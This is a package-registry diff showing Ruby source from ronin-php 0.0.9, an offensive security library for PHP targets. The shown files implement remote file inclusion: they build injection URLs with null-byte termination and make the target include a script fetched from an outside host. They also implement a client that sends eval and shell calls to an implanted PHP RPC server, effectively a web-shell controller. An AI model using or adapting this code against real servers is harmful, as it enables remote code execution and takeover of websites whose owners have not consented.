ronin-php 0.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- data/COPYING.txt +339 -0
- data/History.txt +10 -0
- data/Manifest.txt +36 -0
- data/README.txt +70 -0
- data/Rakefile +19 -0
- data/lib/ronin/php.rb +27 -0
- data/lib/ronin/php/extensions.rb +24 -0
- data/lib/ronin/php/extensions/string.rb +42 -0
- data/lib/ronin/php/lfi.rb +28 -0
- data/lib/ronin/php/lfi/exceptions.rb +24 -0
- data/lib/ronin/php/lfi/exceptions/unknown_target.rb +31 -0
- data/lib/ronin/php/lfi/extensions.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri/http.rb +58 -0
- data/lib/ronin/php/lfi/file.rb +86 -0
- data/lib/ronin/php/lfi/lfi.rb +245 -0
- data/lib/ronin/php/lfi/target.rb +344 -0
- data/lib/ronin/php/rfi.rb +25 -0
- data/lib/ronin/php/rfi/extensions.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri/http.rb +54 -0
- data/lib/ronin/php/rfi/rfi.rb +127 -0
- data/lib/ronin/rpc/php.rb +28 -0
- data/lib/ronin/rpc/php/call.rb +45 -0
- data/lib/ronin/rpc/php/client.rb +152 -0
- data/lib/ronin/rpc/php/console.rb +42 -0
- data/lib/ronin/rpc/php/response.rb +63 -0
- data/lib/ronin/rpc/php/rfi.rb +46 -0
- data/lib/ronin/rpc/php/shell.rb +70 -0
- data/spec/spec_helper.rb +5 -0
- data/static/rfi/test.php +27 -0
- data/static/rpc/server.php +482 -0
- data/tasks/helpers.rb +1 -0
- data/tasks/helpers/minify.rb +54 -0
- data/tasks/spec.rb +7 -0
- data/tasks/static.rb +34 -0
- metadata +132 -0
@@ -0,0 +1,127 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/network/http'
|
25
|
+
require 'ronin/extensions/uri'
|
26
|
+
require 'ronin/formatting/digest'
|
27
|
+
require 'ronin/chars'
|
28
|
+
|
29
|
+
module Ronin
|
30
|
+
module PHP
|
31
|
+
class RFI
|
32
|
+
|
33
|
+
# Default URL of the RFI Test script
|
34
|
+
TEST_SCRIPT = 'http://ronin.rubyforge.org/dist/php/rfi/test.php'
|
35
|
+
|
36
|
+
# Prefix text that will appear before the random RFI challenge string
|
37
|
+
CHALLENGE_PREFIX = 'PHP RFI Response: '
|
38
|
+
|
39
|
+
# RFI vulnerable url
|
40
|
+
attr_reader :url
|
41
|
+
|
42
|
+
# RFI vulnerable query parameter
|
43
|
+
attr_reader :param
|
44
|
+
|
45
|
+
# Whether to terminate the RFI script url with a null byte
|
46
|
+
attr_accessor :terminate
|
47
|
+
|
48
|
+
# URL of the RFI Test script
|
49
|
+
attr_accessor :test_script
|
50
|
+
|
51
|
+
#
|
52
|
+
# Creates a new RFI object with the specified _url_, _param_ and given
|
53
|
+
# _options_.
|
54
|
+
#
|
55
|
+
# _options may contain the following keys:
|
56
|
+
# <tt>:terminate</tt>:: Whether or not to terminate the RFI script url
|
57
|
+
# with a null byte. Defaults to +true+.
|
58
|
+
# <tt>:test_script</tt>:: URL of RFI test script. Defaults to
|
59
|
+
# TEST_SCRIPT.
|
60
|
+
#
|
61
|
+
def initialize(url,param,options={})
|
62
|
+
@url = url
|
63
|
+
@param = param
|
64
|
+
|
65
|
+
if options.has_key?(:terminate)
|
66
|
+
@terminate = options[:terminate]
|
67
|
+
else
|
68
|
+
@terminate = true
|
69
|
+
end
|
70
|
+
|
71
|
+
@test_script = (options[:test_script] || TEST_SCRIPT)
|
72
|
+
end
|
73
|
+
|
74
|
+
#
|
75
|
+
# Returns +true+ if the RFI script url will be terminated with
|
76
|
+
# a null byte, returns +false+ otherwise.
|
77
|
+
#
|
78
|
+
def terminate?
|
79
|
+
@terminate == true
|
80
|
+
end
|
81
|
+
|
82
|
+
#
|
83
|
+
# Builds a RFI url to include the specified _script_url_.
|
84
|
+
#
|
85
|
+
def url_for(script_url)
|
86
|
+
script_url = URI(script_url.to_s)
|
87
|
+
new_url = URI(@url.to_s)
|
88
|
+
|
89
|
+
new_url.query_params.merge!(script_url.query_params)
|
90
|
+
script_url.query_params.clear
|
91
|
+
|
92
|
+
script_url = "#{script_url}?" if terminate?
|
93
|
+
|
94
|
+
new_url.query_params[@param.to_s] = script_url
|
95
|
+
return new_url
|
96
|
+
end
|
97
|
+
|
98
|
+
#
|
99
|
+
# Include the specified RFI _script_ using the given _options_.
|
100
|
+
#
|
101
|
+
def include(script,options={})
|
102
|
+
options = options.merge(:url => url_for(script))
|
103
|
+
|
104
|
+
if options[:method] == :post
|
105
|
+
return Net.http_post_body(options)
|
106
|
+
else
|
107
|
+
return Net.http_get_body(options)
|
108
|
+
end
|
109
|
+
end
|
110
|
+
|
111
|
+
#
|
112
|
+
# Returns +true+ if the url is vulnerable to RFI, returns +false+
|
113
|
+
# otherwise.
|
114
|
+
#
|
115
|
+
def vulnerable?(options={})
|
116
|
+
challenge = Chars.alpha_numeric.random_string(10).md5
|
117
|
+
|
118
|
+
test_url = URI(@test_script.to_s)
|
119
|
+
test_url.query_params['rfi_challenge'] = challenge
|
120
|
+
|
121
|
+
response = include(test_url,options)
|
122
|
+
return response.include?("#{CHALLENGE_PREFIX}#{challenge}")
|
123
|
+
end
|
124
|
+
|
125
|
+
end
|
126
|
+
end
|
127
|
+
end
|
@@ -0,0 +1,28 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/rpc/php/call'
|
25
|
+
require 'ronin/rpc/php/client'
|
26
|
+
require 'ronin/rpc/php/console'
|
27
|
+
require 'ronin/rpc/php/shell'
|
28
|
+
require 'ronin/rpc/php/rfi'
|
@@ -0,0 +1,45 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/rpc/call'
|
25
|
+
require 'ronin/formatting/binary'
|
26
|
+
|
27
|
+
require 'xmlrpc/client'
|
28
|
+
|
29
|
+
module Ronin
|
30
|
+
module RPC
|
31
|
+
module PHP
|
32
|
+
class Call < RPC::Call
|
33
|
+
|
34
|
+
#
|
35
|
+
# Encodes the call and the given _session_ variables into a base64
|
36
|
+
# encoded XMLRPC call message.
|
37
|
+
#
|
38
|
+
def encode(session={})
|
39
|
+
XMLRPC::Create.new.methodCall(@name,session,*(@arguments)).base64_encode
|
40
|
+
end
|
41
|
+
|
42
|
+
end
|
43
|
+
end
|
44
|
+
end
|
45
|
+
end
|
@@ -0,0 +1,152 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/rpc/php/call'
|
25
|
+
require 'ronin/rpc/php/response'
|
26
|
+
require 'ronin/rpc/php/console'
|
27
|
+
require 'ronin/rpc/php/shell'
|
28
|
+
require 'ronin/rpc/client'
|
29
|
+
require 'ronin/network/http'
|
30
|
+
|
31
|
+
module Ronin
|
32
|
+
module RPC
|
33
|
+
module PHP
|
34
|
+
class Client < RPC::Client
|
35
|
+
|
36
|
+
# URL of RPC server
|
37
|
+
attr_reader :url
|
38
|
+
|
39
|
+
# Proxy to send requests through
|
40
|
+
attr_accessor :proxy
|
41
|
+
|
42
|
+
# User-Agent string to send with each request
|
43
|
+
attr_accessor :user_agent
|
44
|
+
|
45
|
+
# Session data
|
46
|
+
attr_reader :session
|
47
|
+
|
48
|
+
# Provides a console service
|
49
|
+
service :console, Console
|
50
|
+
|
51
|
+
# Provides a shell service
|
52
|
+
service :shell, Shell
|
53
|
+
|
54
|
+
#
|
55
|
+
# Creates a new Client object with the specified _url_ and the
|
56
|
+
# given _options_.
|
57
|
+
#
|
58
|
+
# _options_ may contain the following keys:
|
59
|
+
# <tt>:proxy</tt>:: The proxy settings to use when communicating
|
60
|
+
# with the server.
|
61
|
+
# <tt>:user_agent</tt>:: The User-Agent to send to the server.
|
62
|
+
# <tt>:user_agent_alias</tt>:: The User-Agent alias to send to
|
63
|
+
# the server.
|
64
|
+
#
|
65
|
+
def initialize(url,options={})
|
66
|
+
@url = url
|
67
|
+
|
68
|
+
@proxy = options[:proxy]
|
69
|
+
|
70
|
+
if options[:user_agent_alias]
|
71
|
+
@user_agent = Web.user_agent_alias[options[:user_agent_alias]]
|
72
|
+
else
|
73
|
+
@user_agent = options[:user_agent]
|
74
|
+
end
|
75
|
+
|
76
|
+
@cookie = nil
|
77
|
+
@session = {}
|
78
|
+
end
|
79
|
+
|
80
|
+
def call_url(call_object)
|
81
|
+
new_url = URI(@url.to_s)
|
82
|
+
new_url.query_params['rpc_call'] = call_object.encode(@session)
|
83
|
+
|
84
|
+
return new_url
|
85
|
+
end
|
86
|
+
|
87
|
+
#
|
88
|
+
# Returns +true+ if the RPC server is running and responding to
|
89
|
+
# function calls, returns +false+ otherwise.
|
90
|
+
#
|
91
|
+
def running?
|
92
|
+
call(:running)
|
93
|
+
end
|
94
|
+
|
95
|
+
#
|
96
|
+
# Returns a finger-print of the PHP server.
|
97
|
+
#
|
98
|
+
def fingerprint
|
99
|
+
call(:fingerprint)
|
100
|
+
end
|
101
|
+
|
102
|
+
protected
|
103
|
+
|
104
|
+
#
|
105
|
+
# Creates a new Call object for the specified _funtion_ and
|
106
|
+
# _arguments_.
|
107
|
+
#
|
108
|
+
def create_call(function,*arguments)
|
109
|
+
Call.new(function,*arguments)
|
110
|
+
end
|
111
|
+
|
112
|
+
#
|
113
|
+
# Sends the specified _call_object_ to the RPC server. Returns
|
114
|
+
# a new Response object that represents the server's response.
|
115
|
+
#
|
116
|
+
def send_call(call_object)
|
117
|
+
resp = Net.http_get(:url => call_url(call_object),
|
118
|
+
:cookie => @cookie,
|
119
|
+
:proxy => @proxy,
|
120
|
+
:user_agent => @user_agent)
|
121
|
+
|
122
|
+
new_cookie = resp['Set-Cookie']
|
123
|
+
@cookie = new_cookie if new_cookie
|
124
|
+
|
125
|
+
return Response.new(resp.body)
|
126
|
+
end
|
127
|
+
|
128
|
+
#
|
129
|
+
# Returns the return-value of a previous function call encoded
|
130
|
+
# into the specified _response_. If the _response_ contains
|
131
|
+
# a fault message, the fault exception will be raised.
|
132
|
+
#
|
133
|
+
def return_value(response)
|
134
|
+
status, params = response.decode
|
135
|
+
|
136
|
+
unless status
|
137
|
+
raise(params)
|
138
|
+
end
|
139
|
+
|
140
|
+
@session.merge!(params['session'])
|
141
|
+
|
142
|
+
if params.has_key?('output')
|
143
|
+
print(params['output'])
|
144
|
+
end
|
145
|
+
|
146
|
+
return params['return_value']
|
147
|
+
end
|
148
|
+
|
149
|
+
end
|
150
|
+
end
|
151
|
+
end
|
152
|
+
end
|
@@ -0,0 +1,42 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/rpc/console'
|
25
|
+
|
26
|
+
module Ronin
|
27
|
+
module RPC
|
28
|
+
module PHP
|
29
|
+
class Console < RPC::Console
|
30
|
+
|
31
|
+
#
|
32
|
+
# Evaluates the specified _string_ of PHP code and returns the
|
33
|
+
# result.
|
34
|
+
#
|
35
|
+
def eval(string)
|
36
|
+
call(:eval,string)
|
37
|
+
end
|
38
|
+
|
39
|
+
end
|
40
|
+
end
|
41
|
+
end
|
42
|
+
end
|
@@ -0,0 +1,63 @@
|
|
1
|
+
#
|
2
|
+
#--
|
3
|
+
# Ronin PHP - A Ruby library for Ronin that provides support for PHP
|
4
|
+
# related security tasks.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# This program is free software; you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU General Public License as published by
|
10
|
+
# the Free Software Foundation; either version 2 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# This program is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with this program; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
#++
|
22
|
+
#
|
23
|
+
|
24
|
+
require 'ronin/rpc/exceptions/response_missing'
|
25
|
+
require 'ronin/rpc/response'
|
26
|
+
|
27
|
+
require 'xmlrpc/client'
|
28
|
+
|
29
|
+
module Ronin
|
30
|
+
module RPC
|
31
|
+
module PHP
|
32
|
+
class Response < RPC::Response
|
33
|
+
|
34
|
+
#
|
35
|
+
# Returns the default XML parser to use for parsing XMLRPC
|
36
|
+
# responses.
|
37
|
+
#
|
38
|
+
def Response.parser
|
39
|
+
@@parser ||= XMLRPC::XMLParser::REXMLStreamParser.new
|
40
|
+
end
|
41
|
+
|
42
|
+
def Response.parser=(new_parser)
|
43
|
+
@@parser = new_parser
|
44
|
+
end
|
45
|
+
|
46
|
+
#
|
47
|
+
# Decodes the XMLRPC response message embedded in the response
|
48
|
+
# from the server.
|
49
|
+
#
|
50
|
+
def decode
|
51
|
+
response = @contents[/<rpc>.*<\/rpc>/m]
|
52
|
+
|
53
|
+
unless response
|
54
|
+
raise(ResponseMissing,"failed to receive a valid RPC method response",caller)
|
55
|
+
end
|
56
|
+
|
57
|
+
return Response.parser.parseMethodResponse(response)
|
58
|
+
end
|
59
|
+
|
60
|
+
end
|
61
|
+
end
|
62
|
+
end
|
63
|
+
end
|